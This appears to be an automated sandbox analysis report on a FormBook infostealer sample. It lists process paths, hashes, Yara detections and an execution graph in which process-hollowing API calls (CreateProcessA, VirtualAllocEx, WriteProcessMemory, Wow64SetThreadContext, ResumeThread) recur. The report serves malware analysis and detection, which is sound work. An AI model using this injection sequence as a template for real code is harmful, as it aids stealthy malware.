                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:4
                                                      Start time:11:43:09
                                                      Start date:03/07/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:8
                                                      Start time:11:43:46
                                                      Start date:03/07/2024
                                                      Path:C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe"
                                                      Imagebase:0x830000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4152697754.0000000004530000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4152697754.0000000004530000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:9
                                                      Start time:11:43:48
                                                      Start date:03/07/2024
                                                      Path:C:\Windows\SysWOW64\fc.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\fc.exe"
                                                      Imagebase:0xcc0000
                                                      File size:22'528 bytes
                                                      MD5 hash:4D5F86B337D0D099E18B14F1428AAEFF
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4152828319.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4152828319.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4152767044.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4152767044.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      Reputation:moderate
                                                      Has exited:false

                                                      General

                                                      Target ID:11
                                                      Start time:11:44:02
                                                      Start date:03/07/2024
                                                      Path:C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe"
                                                      Imagebase:0x830000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.4154513255.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.4154513255.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:12
                                                      Start time:11:44:15
                                                      Start date:03/07/2024
                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                      Imagebase:0x7ff6bf500000
                                                      File size:676'768 bytes
                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:13.2%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:13%
                                                        Total number of Nodes:322
                                                        Total number of Limit Nodes:32
                                                        execution_graph 31476 2c24dd0 31477 2c24f90 31476->31477 31479 2c24df6 31476->31479 31478 2c24f5b 31478->31478 31479->31478 31481 2c231f0 31479->31481 31482 2c25050 PostMessageW 31481->31482 31483 2c250bc 31482->31483 31483->31479 31151 12d4668 31152 12d467a 31151->31152 31154 12d4686 31152->31154 31155 12d4779 31152->31155 31156 12d479d 31155->31156 31160 12d4878 31156->31160 31164 12d4888 31156->31164 31162 12d4882 31160->31162 31161 12d498c 31161->31161 31162->31161 31168 12d44e0 31162->31168 31166 12d48af 31164->31166 31165 12d498c 31165->31165 31166->31165 31167 12d44e0 CreateActCtxA 31166->31167 31167->31165 31169 12d5918 CreateActCtxA 31168->31169 31171 12d59db 31169->31171 31171->31171 31484 12dd438 31485 12dd47e GetCurrentProcess 31484->31485 31487 12dd4c9 31485->31487 31488 12dd4d0 GetCurrentThread 31485->31488 31487->31488 31489 12dd50d GetCurrentProcess 31488->31489 31490 12dd506 31488->31490 31491 12dd543 31489->31491 31490->31489 31492 12dd56b GetCurrentThreadId 31491->31492 31493 12dd59c 31492->31493 31494 2c21198 31495 2c211cb 31494->31495 31496 2c21239 31495->31496 31497 2c21581 ResumeThread 31495->31497 31497->31496 31498 12dacb0 31499 12dacbf 31498->31499 31502 12dada8 31498->31502 31510 12dad97 31498->31510 31503 12daddc 31502->31503 31504 12dadb9 31502->31504 31503->31499 31504->31503 31518 12db031 31504->31518 31522 12db040 31504->31522 31505 12dadd4 31505->31503 31506 12dafe0 GetModuleHandleW 31505->31506 31507 12db00d 31506->31507 31507->31499 31511 12dadb9 31510->31511 31512 12daddc 31510->31512 31511->31512 31516 12db031 LoadLibraryExW 31511->31516 31517 12db040 LoadLibraryExW 31511->31517 31512->31499 31513 12dadd4 31513->31512 31514 12dafe0 GetModuleHandleW 31513->31514 31515 12db00d 31514->31515 31515->31499 31516->31513 31517->31513 31519 12db054 31518->31519 31521 12db079 31519->31521 31526 12da168 31519->31526 31521->31505 31523 12db054 31522->31523 31524 12da168 LoadLibraryExW 31523->31524 31525 12db079 31523->31525 31524->31525 31525->31505 31527 12db220 LoadLibraryExW 31526->31527 31529 12db299 31527->31529 31529->31521 31530 12dd680 DuplicateHandle 31531 12dd716 31530->31531 31172 2c2290c 31177 2c23bf0 31172->31177 31200 2c23c56 31172->31200 31224 2c23be1 31172->31224 31173 2c2291b 31178 2c23c0a 31177->31178 31247 2c24742 31178->31247 31252 2c2487c 31178->31252 31260 2c2423f 31178->31260 31265 2c23f19 31178->31265 31277 2c2455b 31178->31277 31290 2c245b5 31178->31290 31298 2c23f50 31178->31298 31310 2c24613 31178->31310 31314 2c24472 31178->31314 31330 2c24672 31178->31330 31338 2c24369 31178->31338 31346 2c23f28 31178->31346 31358 2c241c8 31178->31358 31366 2c241aa 31178->31366 31371 2c242c5 31178->31371 31379 2c242a6 31178->31379 31387 2c24506 31178->31387 31395 2c24186 31178->31395 31403 2c23ec1 31178->31403 31415 2c24540 31178->31415 31179 2c23c12 31179->31173 31201 2c23be4 31200->31201 31203 2c23c59 31200->31203 31204 2c24742 2 API calls 31201->31204 31205 2c24540 6 API calls 31201->31205 31206 2c23ec1 6 API calls 31201->31206 31207 2c24186 6 API calls 31201->31207 31208 2c24506 6 API calls 31201->31208 31209 2c242a6 4 API calls 31201->31209 31210 2c242c5 6 API calls 31201->31210 31211 2c241aa 2 API calls 31201->31211 31212 2c241c8 6 API calls 31201->31212 31213 2c23f28 6 API calls 31201->31213 31214 2c24369 6 API calls 31201->31214 31215 2c24672 6 API calls 31201->31215 31216 2c24472 10 API calls 31201->31216 31217 2c24613 2 API calls 31201->31217 31218 2c23f50 6 API calls 31201->31218 31219 2c245b5 6 API calls 31201->31219 31220 2c2455b 8 API calls 31201->31220 31221 2c23f19 6 API calls 31201->31221 31222 2c2423f 2 API calls 31201->31222 31223 2c2487c 2 API calls 31201->31223 31202 2c23c12 31202->31173 31203->31173 31204->31202 31205->31202 31206->31202 31207->31202 31208->31202 31209->31202 31210->31202 31211->31202 31212->31202 31213->31202 31214->31202 31215->31202 31216->31202 31217->31202 31218->31202 31219->31202 31220->31202 31221->31202 31222->31202 31223->31202 31225 2c23c0a 31224->31225 31227 2c24742 2 API calls 31225->31227 31228 2c24540 6 API calls 31225->31228 31229 2c23ec1 6 API calls 31225->31229 31230 2c24186 6 API calls 31225->31230 31231 2c24506 6 API calls 31225->31231 31232 2c242a6 4 API calls 31225->31232 31233 2c242c5 6 API calls 31225->31233 31234 2c241aa 2 API calls 31225->31234 31235 2c241c8 6 API calls 31225->31235 31236 2c23f28 6 API calls 31225->31236 31237 2c24369 6 API calls 31225->31237 31238 2c24672 6 API calls 31225->31238 31239 2c24472 10 API calls 31225->31239 31240 2c24613 2 API calls 31225->31240 31241 2c23f50 6 API calls 31225->31241 31242 2c245b5 6 API calls 31225->31242 31243 2c2455b 8 API calls 31225->31243 31244 2c23f19 6 API calls 31225->31244 31245 2c2423f 2 API calls 31225->31245 31246 2c2487c 2 API calls 31225->31246 31226 2c23c12 31226->31173 31227->31226 31228->31226 31229->31226 31230->31226 31231->31226 31232->31226 31233->31226 31234->31226 31235->31226 31236->31226 31237->31226 31238->31226 31239->31226 31240->31226 31241->31226 31242->31226 31243->31226 31244->31226 31245->31226 31246->31226 31248 2c24765 31247->31248 31423 2c22040 31248->31423 31427 2c22038 31248->31427 31249 2c24a0f 31253 2c24882 31252->31253 31254 2c2428e 31253->31254 31257 2c22128 ReadProcessMemory 31253->31257 31432 2c22130 31253->31432 31255 2c2471b 31254->31255 31258 2c22130 ReadProcessMemory 31254->31258 31436 2c22128 31254->31436 31255->31179 31257->31254 31258->31254 31261 2c24245 31260->31261 31262 2c2471b 31261->31262 31263 2c22130 ReadProcessMemory 31261->31263 31264 2c22128 ReadProcessMemory 31261->31264 31262->31179 31263->31261 31264->31261 31267 2c23f28 31265->31267 31266 2c23edb 31266->31179 31267->31179 31267->31266 31441 2c222c8 31267->31441 31445 2c222bc 31267->31445 31268 2c24167 31269 2c23f28 6 API calls 31268->31269 31270 2c247b2 31268->31270 31450 2c21581 31268->31450 31455 2c21588 31268->31455 31459 2c21630 31268->31459 31464 2c21638 31268->31464 31269->31268 31270->31179 31278 2c24561 31277->31278 31284 2c22040 WriteProcessMemory 31278->31284 31285 2c22038 WriteProcessMemory 31278->31285 31279 2c24596 31280 2c23f28 6 API calls 31279->31280 31282 2c24192 31280->31282 31281 2c23f28 6 API calls 31281->31282 31282->31281 31283 2c247b2 31282->31283 31286 2c21581 ResumeThread 31282->31286 31287 2c21588 ResumeThread 31282->31287 31288 2c21630 Wow64SetThreadContext 31282->31288 31289 2c21638 Wow64SetThreadContext 31282->31289 31283->31283 31284->31279 31285->31279 31286->31282 31287->31282 31288->31282 31289->31282 31292 2c24192 31290->31292 31291 2c23f28 6 API calls 31291->31292 31292->31291 31293 2c247b2 31292->31293 31294 2c21630 Wow64SetThreadContext 31292->31294 31295 2c21638 Wow64SetThreadContext 31292->31295 31296 2c21581 ResumeThread 31292->31296 31297 2c21588 ResumeThread 31292->31297 31293->31293 31294->31292 31295->31292 31296->31292 31297->31292 31300 2c23f83 31298->31300 31299 2c24126 31299->31179 31300->31299 31308 2c222c8 CreateProcessA 31300->31308 31309 2c222bc CreateProcessA 31300->31309 31301 2c23f28 6 API calls 31303 2c24167 31301->31303 31302 2c247b2 31302->31179 31303->31301 31303->31302 31304 2c21630 Wow64SetThreadContext 31303->31304 31305 2c21638 Wow64SetThreadContext 31303->31305 31306 2c21581 ResumeThread 31303->31306 31307 2c21588 ResumeThread 31303->31307 31304->31303 31305->31303 31306->31303 31307->31303 31308->31303 31309->31303 31312 2c22040 WriteProcessMemory 31310->31312 31313 2c22038 WriteProcessMemory 31310->31313 31311 2c2463b 31312->31311 31313->31311 31468 2c21f80 31314->31468 31472 2c21f78 31314->31472 31315 2c24490 31316 2c2481e 31315->31316 31324 2c22040 WriteProcessMemory 31315->31324 31325 2c22038 WriteProcessMemory 31315->31325 31316->31179 31317 2c24596 31318 2c23f28 6 API calls 31317->31318 31320 2c24192 31318->31320 31319 2c23f28 6 API calls 31319->31320 31320->31319 31321 2c247b2 31320->31321 31326 2c21581 ResumeThread 31320->31326 31327 2c21588 ResumeThread 31320->31327 31328 2c21630 Wow64SetThreadContext 31320->31328 31329 2c21638 Wow64SetThreadContext 31320->31329 31321->31321 31324->31317 31325->31317 31326->31320 31327->31320 31328->31320 31329->31320 31332 2c24192 31330->31332 31331 2c23f28 6 API calls 31331->31332 31332->31331 31333 2c247b2 31332->31333 31334 2c21581 ResumeThread 31332->31334 31335 2c21588 ResumeThread 31332->31335 31336 2c21630 Wow64SetThreadContext 31332->31336 31337 2c21638 Wow64SetThreadContext 31332->31337 31333->31333 31334->31332 31335->31332 31336->31332 31337->31332 31341 2c24192 31338->31341 31339 2c247b2 31340 2c23f28 6 API calls 31340->31341 31341->31339 31341->31340 31342 2c21630 Wow64SetThreadContext 31341->31342 31343 2c21638 Wow64SetThreadContext 31341->31343 31344 2c21581 ResumeThread 31341->31344 31345 2c21588 ResumeThread 31341->31345 31342->31341 31343->31341 31344->31341 31345->31341 31348 2c23f2d 31346->31348 31347 2c23edb 31347->31179 31348->31179 31348->31347 31352 2c222c8 CreateProcessA 31348->31352 31353 2c222bc CreateProcessA 31348->31353 31349 2c23f28 6 API calls 31351 2c24167 31349->31351 31350 2c247b2 31350->31179 31351->31349 31351->31350 31354 2c21630 Wow64SetThreadContext 31351->31354 31355 2c21638 Wow64SetThreadContext 31351->31355 31356 2c21581 ResumeThread 31351->31356 31357 2c21588 ResumeThread 31351->31357 31352->31351 31353->31351 31354->31351 31355->31351 31356->31351 31357->31351 31361 2c24192 31358->31361 31359 2c247b2 31360 2c23f28 6 API calls 31360->31361 31361->31359 31361->31360 31362 2c21581 ResumeThread 31361->31362 31363 2c21588 ResumeThread 31361->31363 31364 2c21630 Wow64SetThreadContext 31361->31364 31365 2c21638 Wow64SetThreadContext 31361->31365 31362->31361 31363->31361 31364->31361 31365->31361 31367 2c241b0 31366->31367 31368 2c2471b 31367->31368 31369 2c22130 ReadProcessMemory 31367->31369 31370 2c22128 ReadProcessMemory 31367->31370 31368->31179 31369->31367 31370->31367 31373 2c24192 31371->31373 31372 2c23f28 6 API calls 31372->31373 31373->31371 31373->31372 31374 2c247b2 31373->31374 31375 2c21630 Wow64SetThreadContext 31373->31375 31376 2c21638 Wow64SetThreadContext 31373->31376 31377 2c21581 ResumeThread 31373->31377 31378 2c21588 ResumeThread 31373->31378 31374->31374 31375->31373 31376->31373 31377->31373 31378->31373 31380 2c242af 31379->31380 31381 2c241c1 31380->31381 31383 2c21630 Wow64SetThreadContext 31380->31383 31384 2c21638 Wow64SetThreadContext 31380->31384 31382 2c2471b 31381->31382 31385 2c22130 ReadProcessMemory 31381->31385 31386 2c22128 ReadProcessMemory 31381->31386 31382->31179 31383->31380 31384->31380 31385->31381 31386->31381 31389 2c24192 31387->31389 31388 2c247b2 31389->31388 31390 2c23f28 6 API calls 31389->31390 31391 2c21630 Wow64SetThreadContext 31389->31391 31392 2c21638 Wow64SetThreadContext 31389->31392 31393 2c21581 ResumeThread 31389->31393 31394 2c21588 ResumeThread 31389->31394 31390->31389 31391->31389 31392->31389 31393->31389 31394->31389 31396 2c24192 31395->31396 31397 2c23f28 6 API calls 31396->31397 31398 2c247b2 31396->31398 31399 2c21581 ResumeThread 31396->31399 31400 2c21588 ResumeThread 31396->31400 31401 2c21630 Wow64SetThreadContext 31396->31401 31402 2c21638 Wow64SetThreadContext 31396->31402 31397->31396 31399->31396 31400->31396 31401->31396 31402->31396 31405 2c23f4d 31403->31405 31404 2c24126 31404->31179 31405->31404 31409 2c222c8 CreateProcessA 31405->31409 31410 2c222bc CreateProcessA 31405->31410 31406 2c23f28 6 API calls 31408 2c24167 31406->31408 31407 2c247b2 31407->31179 31408->31406 31408->31407 31411 2c21630 Wow64SetThreadContext 31408->31411 31412 2c21638 Wow64SetThreadContext 31408->31412 31413 2c21581 ResumeThread 31408->31413 31414 2c21588 ResumeThread 31408->31414 31409->31408 31410->31408 31411->31408 31412->31408 31413->31408 31414->31408 31417 2c24192 31415->31417 31416 2c23f28 6 API calls 31416->31417 31417->31416 31418 2c247b2 31417->31418 31419 2c21630 Wow64SetThreadContext 31417->31419 31420 2c21638 Wow64SetThreadContext 31417->31420 31421 2c21581 ResumeThread 31417->31421 31422 2c21588 ResumeThread 31417->31422 31418->31418 31419->31417 31420->31417 31421->31417 31422->31417 31424 2c22088 WriteProcessMemory 31423->31424 31426 2c220df 31424->31426 31426->31249 31428 2c2203f WriteProcessMemory 31427->31428 31430 2c21fff 31427->31430 31431 2c220df 31428->31431 31430->31249 31431->31249 31433 2c2217b ReadProcessMemory 31432->31433 31435 2c221bf 31433->31435 31435->31254 31437 2c2212f ReadProcessMemory 31436->31437 31438 2c220ef 31436->31438 31440 2c221bf 31437->31440 31438->31254 31440->31254 31442 2c22351 31441->31442 31442->31442 31443 2c224b6 CreateProcessA 31442->31443 31444 2c22513 31443->31444 31446 2c22287 31445->31446 31447 2c222c7 CreateProcessA 31445->31447 31446->31268 31449 2c22513 31447->31449 31449->31449 31451 2c21547 31450->31451 31452 2c21587 ResumeThread 31450->31452 31451->31268 31454 2c215f7 31452->31454 31454->31268 31456 2c215c8 ResumeThread 31455->31456 31458 2c215f7 31456->31458 31458->31268 31460 2c215f7 31459->31460 31461 2c21637 Wow64SetThreadContext 31459->31461 31460->31268 31463 2c216c5 31461->31463 31463->31268 31465 2c2167d Wow64SetThreadContext 31464->31465 31467 2c216c5 31465->31467 31467->31268 31469 2c21fc0 VirtualAllocEx 31468->31469 31471 2c21ffd 31469->31471 31471->31315 31473 2c21f3f 31472->31473 31473->31472 31474 2c21fca VirtualAllocEx 31473->31474 31475 2c21ffd 31474->31475 31475->31315

                                                        Executed Functions

                                                        Function 07183D50 Relevance: 9.0, Strings: 7, Instructions: 280COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 294 7183d50-7183d79 375 7183d79 call 7184190 294->375 376 7183d79 call 7184183 294->376 297 7183d7f-7183dda call 71839ec 306 7183ddd-7183df2 297->306 308 7183df4 306->308 309 7183df9-7183e0e 308->309 310 7183e59-7183ea5 309->310 311 7183e10 309->311 321 7183ee0 310->321 325 7183ea7 310->325 311->308 311->310 312 718409b-7184111 311->312 313 7183f7c-7183fcd 311->313 314 7183f3e 311->314 315 7183e3f-7183e41 311->315 316 7184130-7184137 311->316 317 7183e17-7183e19 311->317 318 7183f28-7183f3c 311->318 319 7183eca-7183ede 311->319 320 7183f4c 311->320 311->321 322 7183e22-7183e3d 311->322 323 7184062-7184065 311->323 324 7183f05 311->324 311->325 392 7184113 call 7188c78 312->392 393 7184113 call 7188c61 312->393 357 7183fcf-7183fd5 313->357 358 7183fe5-7184037 313->358 314->320 329 7183e4a 315->329 330 7183e43-7183e48 315->330 317->306 328 7183e1b-7183e20 317->328 327 7183f0a-7183f1f 318->327 326 7183eac-7183ec1 319->326 331 7183f51-7183f66 320->331 321->324 322->309 377 7184068 call 7186438 323->377 378 7184068 call 7186448 323->378 324->327 325->326 326->321 335 7183ec3 326->335 327->314 336 7183f21 327->336 328->309 340 7183e4f-7183e57 329->340 330->340 331->316 342 7183f6c 331->342 335->312 335->313 335->314 335->316 335->318 335->319 335->320 335->321 335->323 335->324 335->325 336->312 336->313 336->314 336->316 336->318 336->320 336->323 336->324 340->309 341 718406e-7184075 379 718407a call 7187f18 341->379 380 718407a call 7187f28 341->380 381 718407a call 71880d8 341->381 382 718407a call 7188169 341->382 383 718407a call 718726c 341->383 384 718407a call 718728c 341->384 385 718407a call 71872ac 341->385 386 718407a call 7188120 341->386 387 718407a call 7187260 341->387 342->312 342->313 342->316 342->320 342->323 346 7184080 388 7184082 call 7188788 346->388 389 7184082 call 7188779 346->389 390 7184082 call 718877b 346->390 391 7184082 call 71882b1 346->391 348 7184088-7184096 348->331 359 7183fd9-7183fdb 357->359 360 7183fd7 357->360 371 7184039-718403f 358->371 372 718404f-718405d 358->372 359->358 360->358 367 7184119 369 7184120-718412b 367->369 369->331 373 7184041 371->373 374 7184043-7184045 371->374 372->331 373->372 374->372 375->297 376->297 377->341 378->341 379->346 380->346 381->346 382->346 383->346 384->346 385->346 386->346 387->346 388->348 389->348 390->348 391->348 392->367 393->367
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !Y3E$Tefq$Tefq$$fq$$fq$$fq$$fq
                                                        • API String ID: 0-1827599424
                                                        • Opcode ID: af5bfa1108f6a19d32b6e00d0c32996ba00e0bb5212e46ddb7209ed1b9809006
                                                        • Instruction ID: 5c4f333326819426d1f2e9e33578bb181b367ce7167affbd8cdb2723050d01be
                                                        • Opcode Fuzzy Hash: af5bfa1108f6a19d32b6e00d0c32996ba00e0bb5212e46ddb7209ed1b9809006
                                                        • Instruction Fuzzy Hash: F4A18E74B102058FCB48AF79C995B6E7AB3BB88700F25842AE916EB3D4DF74DC018B51
                                                        Function 07183CC8 Relevance: 5.4, Strings: 4, Instructions: 383COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 438 7183cc8-7183cd2 440 7183cd9-7183ce2 438->440 441 7183cd4-7183cd6 438->441 442 7183ce9-7183cf2 440->442 443 7183ce4-7183ce6 440->443 441->440 444 7183cf9-7183d27 442->444 445 7183cf4-7183cf6 442->445 443->442 448 7183d29 444->448 449 7183d2e-718783e call 7187254 444->449 445->444 448->449 453 7187840-7187880 449->453 454 7187881-71878a2 449->454 458 71878a9-71878ac 454->458 459 71878a4-71878a6 454->459 461 71878ad-7187916 458->461 460 71878a8 459->460 459->461 460->458 463 7187918-718791e 461->463 464 718791f-718793c 461->464 463->464
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Tefq$Tefq$$fq$$fq
                                                        • API String ID: 0-235189018
                                                        • Opcode ID: 42ae7093cc753eaa277514084a74cb1dedaed5c301654c6e3b08782f7c0e544e
                                                        • Instruction ID: a5cd0b0d61f461a57d71b775944d8b5bdbf16bc9f586dc62a9db8168df8738b5
                                                        • Opcode Fuzzy Hash: 42ae7093cc753eaa277514084a74cb1dedaed5c301654c6e3b08782f7c0e544e
                                                        • Instruction Fuzzy Hash: E6D1BF71B103058FCB45EB78C8956AEBBB2AF89700F15846AE516EB3D1DF30DC418B91
                                                        Function 07183EE3 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 597 7183ee3-7183f03 599 7183f3e 597->599 600 7183f05 597->600 602 7183f4c 599->602 601 7183f0a-7183f1f 600->601 601->599 603 7183f21 601->603 604 7183f51-7183f66 602->604 603->599 603->600 603->602 605 7183f28-7183f3c 603->605 606 718409b-7184111 603->606 607 7183f7c-7183fcd 603->607 608 7184130-7184137 603->608 609 7184062-7184065 603->609 604->608 610 7183f6c 604->610 605->601 654 7184113 call 7188c78 606->654 655 7184113 call 7188c61 606->655 625 7183fcf-7183fd5 607->625 626 7183fe5-7184037 607->626 643 7184068 call 7186438 609->643 644 7184068 call 7186448 609->644 610->602 610->606 610->607 610->608 610->609 613 718406e-7184075 645 718407a call 7187f18 613->645 646 718407a call 7187f28 613->646 647 718407a call 71880d8 613->647 648 718407a call 7188169 613->648 649 718407a call 718726c 613->649 650 718407a call 718728c 613->650 651 718407a call 71872ac 613->651 652 718407a call 7188120 613->652 653 718407a call 7187260 613->653 617 7184080 656 7184082 call 7188788 617->656 657 7184082 call 7188779 617->657 658 7184082 call 718877b 617->658 659 7184082 call 71882b1 617->659 618 7184088-7184096 618->604 627 7183fd9-7183fdb 625->627 628 7183fd7 625->628 639 7184039-718403f 626->639 640 718404f-718405d 626->640 627->626 628->626 635 7184119 637 7184120-718412b 635->637 637->604 641 7184041 639->641 642 7184043-7184045 639->642 640->604 641->640 642->640 643->613 644->613 645->617 646->617 647->617 648->617 649->617 650->617 651->617 652->617 653->617 654->635 655->635 656->618 657->618 658->618 659->618
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $fq$$fq
                                                        • API String ID: 0-2537786760
                                                        • Opcode ID: 52ed16147c5c21a4d347b2e010bacc15238f3a6202489d0ae2a8287b5dbee686
                                                        • Instruction ID: 50a479c05972e3758361e6ef362d315a627e8b77ddde2fcf5fec83c0da2771f2
                                                        • Opcode Fuzzy Hash: 52ed16147c5c21a4d347b2e010bacc15238f3a6202489d0ae2a8287b5dbee686
                                                        • Instruction Fuzzy Hash: F2519E74B102099FDB589EB4D995B6E7AB3BB88700F248429F9069B3D4CF75DC418B81
                                                        Function 07186438 Relevance: 1.6, Strings: 1, Instructions: 313COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ~H@
                                                        • API String ID: 0-3968150030
                                                        • Opcode ID: 578859dc5bee21f9a7219c5eacbcf3f14b3cd6c7917df2e0d5e31629397c1869
                                                        • Instruction ID: b12d826e347d43da3e2f26abcbb016806f26be9c0d78240e869b3b863f7316b3
                                                        • Opcode Fuzzy Hash: 578859dc5bee21f9a7219c5eacbcf3f14b3cd6c7917df2e0d5e31629397c1869
                                                        • Instruction Fuzzy Hash: FCC1F3B0B14211CBCB69DB69D8A156EFBF6AFC6310B18856ED446DB2A6C770EC41CF40
                                                        Function 0718877B Relevance: 1.4, Strings: 1, Instructions: 118COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: T(z
                                                        • API String ID: 0-3184255237
                                                        • Opcode ID: 1912fc0db45d0d9446aaf80025f573bc290ae0bcf6b468d8eda63ac4fe3bd593
                                                        • Instruction ID: 2f0f30198729606fd63f1ad82ec6fc40f84f8130f0469d52580ce5536dbe0b34
                                                        • Opcode Fuzzy Hash: 1912fc0db45d0d9446aaf80025f573bc290ae0bcf6b468d8eda63ac4fe3bd593
                                                        • Instruction Fuzzy Hash: 4C413CB1F34105CBDB98EAB989516BFB6B7EBC9600F91C42AD501BB2D4CB308D418F51
                                                        Function 07188788 Relevance: 1.4, Strings: 1, Instructions: 116COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1720402416.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: T(z
                                                        • API String ID: 0-3184255237
                                                        • Opcode ID: a931564cf0263d182113d0f93c66805af423f03b28da9ab094ff6e9694a3195a
                                                        • Instruction ID: c8965c9ac777f3ac7544bcda8daca057ab139fcd75407f5410de0637293b2f51
                                                        • Opcode Fuzzy Hash: a931564cf0263d182113d0f93c66805af423f03b28da9ab094ff6e9694a3195a
